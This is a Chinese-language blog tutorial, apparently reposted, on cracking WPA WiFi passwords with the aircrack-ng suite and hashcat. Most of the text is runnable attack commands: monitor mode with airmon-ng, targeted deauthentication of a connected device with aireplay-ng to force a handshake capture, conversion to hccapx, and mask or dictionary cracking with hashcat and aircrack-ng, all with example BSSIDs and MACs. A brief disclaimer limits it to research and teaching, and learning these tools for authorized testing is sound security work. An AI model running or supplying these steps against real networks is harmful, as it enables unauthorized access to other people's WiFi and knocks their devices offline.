HashCat wifi密码

WIFI 密码

要破解 WIFI 密码,首先要抓到 WIFI 的握手包,要想得到 WIFI 的握手包,就需要在监听时刚好有设备连接了该 WIFI,但这就需要运气加成,因此可以我们可以主动将该 WIFI 的设备踢下去,一般设备就会自动连接该 WIFI,此时我们就抓到握手包了。


air*-ng 工具套件介绍:

https://www.cnblogs.com/coisini-zheng/p/15841050.html


命令 说明
aircrack-ng 破解WEP以及WPA(字典攻击)密钥
airdecap-ng 通过已知密钥来解密WEP或WPA嗅探数据
airmon-ng 将网卡设定为监听模式
aireplay-ng 数据包注入工具(Linux和Windows使用CommView驱动程序)
airodump-ng 数据包嗅探:将无线网络数据输送到PCAP或IVS文件并显示网络信息
airtun-ng 创建虚拟管道
airolib-ng 保存、管理ESSID密码列表
packetforge-ng 创建数据包注入用的加密包。
Tools 混合、转换工具
airbase-ng 软件模拟AP
airdecloak-ng 消除pcap文件中的WEP加密
airdriver-ng 无线设备驱动管理工具
airolib-ng 保存、管理ESSID密码列表,计算对应的密钥
airserv-ng 允许不同的进程访问无线网卡
buddy-ngeasside-ng 的文件描述
easside-ng 和AP接入点通讯(无WEP)
tkiptun-ng WPA/TKIP攻击
wesside-ng 自动破解WEP密钥

https://cloud.tencent.com/developer/article/1756342?from=15425

抓取 WIFI 握手包

1、将网卡处于监听状态

airmon-ng check 
airmon-ng check kill // 关闭影响监听状态的进程
airmon-ng start wlan0

wlan0 是网卡名称,一般都是 wlan0,如果不是则需要根据自己的情况进行修改,可通过 iwconfig 进行查看网卡的名称

当使用 iwconfig 查看网卡名称变为 wlan0mon 说明此时网卡已经处于监听模式了


2、扫描可用 WIFI

airodump-ng wlan0mon

3、获取wifi的握手包

1)扫描设备信息

airodump-ng -c (上一步扫描的 CH ) --bssid (想要破解 WIFI 的 bssid ) -w (握手文件存放目录) wlan0mon

这里以 ssid 为 teamssix 的 WIFI 为例

airodump-ng -c 1 --bssid 5E:C1:1B:A2:37:F1 -w ./ wlan0mon

2)为了顺利得到 WIFI 的握手包,可以将该 WIFI 下的设备强制踢下去

aireplay-ng -0 0 -a (要破解的 wifi 的 bssid ) -c (强制踢下的设备的 MAC 地址) wlan0mon

可以看到 teamssix 这个 WIFI 有一个设备正在连接,该设备的 MAC 地址为:38:26:2C:13:D3:33,使用以下命令可以将其强制踢下去

aireplay-ng -0 0 -a 5E:C1:1B:A2:37:F1 -c 38:26:2C:13:D3:33 wlan0mon

等待设备重新连接后,当右上角出现 WPA handshake 的时候说明获取成功

参数说明:

https://blog.csdn.net/qq_28773223/article/details/128104513

-0 表示端口连接
0 表示断开的次数(0为无数次)
-a 表示要破解的WIFI路由器 (BSSID列)
-c 表示要踢下线的设备(手机终端) (STATION列)


抓包还可以用 CDLinux 下,水滴工具。


4. 握手包转码

hashcat 使用的是 hccapx 后缀的文件,而上面的获取到的 是cap后缀文件,所以要转码。
1)方式一:在线转码, 使用 hashcat 官网提供的在线工具进行格式转换:

https://hashcat.net/cap2hashcat/

会在同目录下生成 1.hccapx 文件

2)方式二:本地工具转码,hashcat-utils-1.9

介绍页:https://hashcat.net/wiki/doku.php?id=hashcat_utils
下载地址:https://github.com/hashcat/hashcat-utils/releases

cap2hccapx 1.cap 1.hccapx

会在同目录下生成 1.hccapx 文件

cap 名字建议使用 MAC地址命名,防止乱


5、破解密码

1)方式一:使用自带的库生成

hashcat -a 3 -m 2500 1.hccapx ?d?d?d?d?d?d?d?d --force

或者

hashcat -a 3 -m 22000 1.hc22000 ?d?d?d?d?d?d?d?d --force

2)方式二:字典破解
https://blog.csdn.net/qq_28773223/article/details/128104513

aircrack-ng -w passwd.txt -b 5E:C1:1B:A2:37:F1  ./test.cap

-w 密码字典
-b 设备的MAC(BSSID)
./test.cap cap文件

image


作者:TeamsSix
链接:https://www.jianshu.com/p/52d1ed684020
来源:简书
著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。


免责声明:本号所涉及内容仅供安全研究与教学使用,如出现其他风险,后果自负。




参考、来源:
https://blog.csdn.net/m0_58523239/article/details/126330632
https://www.cnblogs.com/jiu0821/p/7628988.html
https://www.cnblogs.com/answerThe/p/12488477.html
https://www.cnblogs.com/answerThe/p/12488383.html
http://anycastyun.com/news/547-cn.html





posted @ 2023-09-06 15:02  悟透  阅读(2261)  评论(0编辑  收藏  举报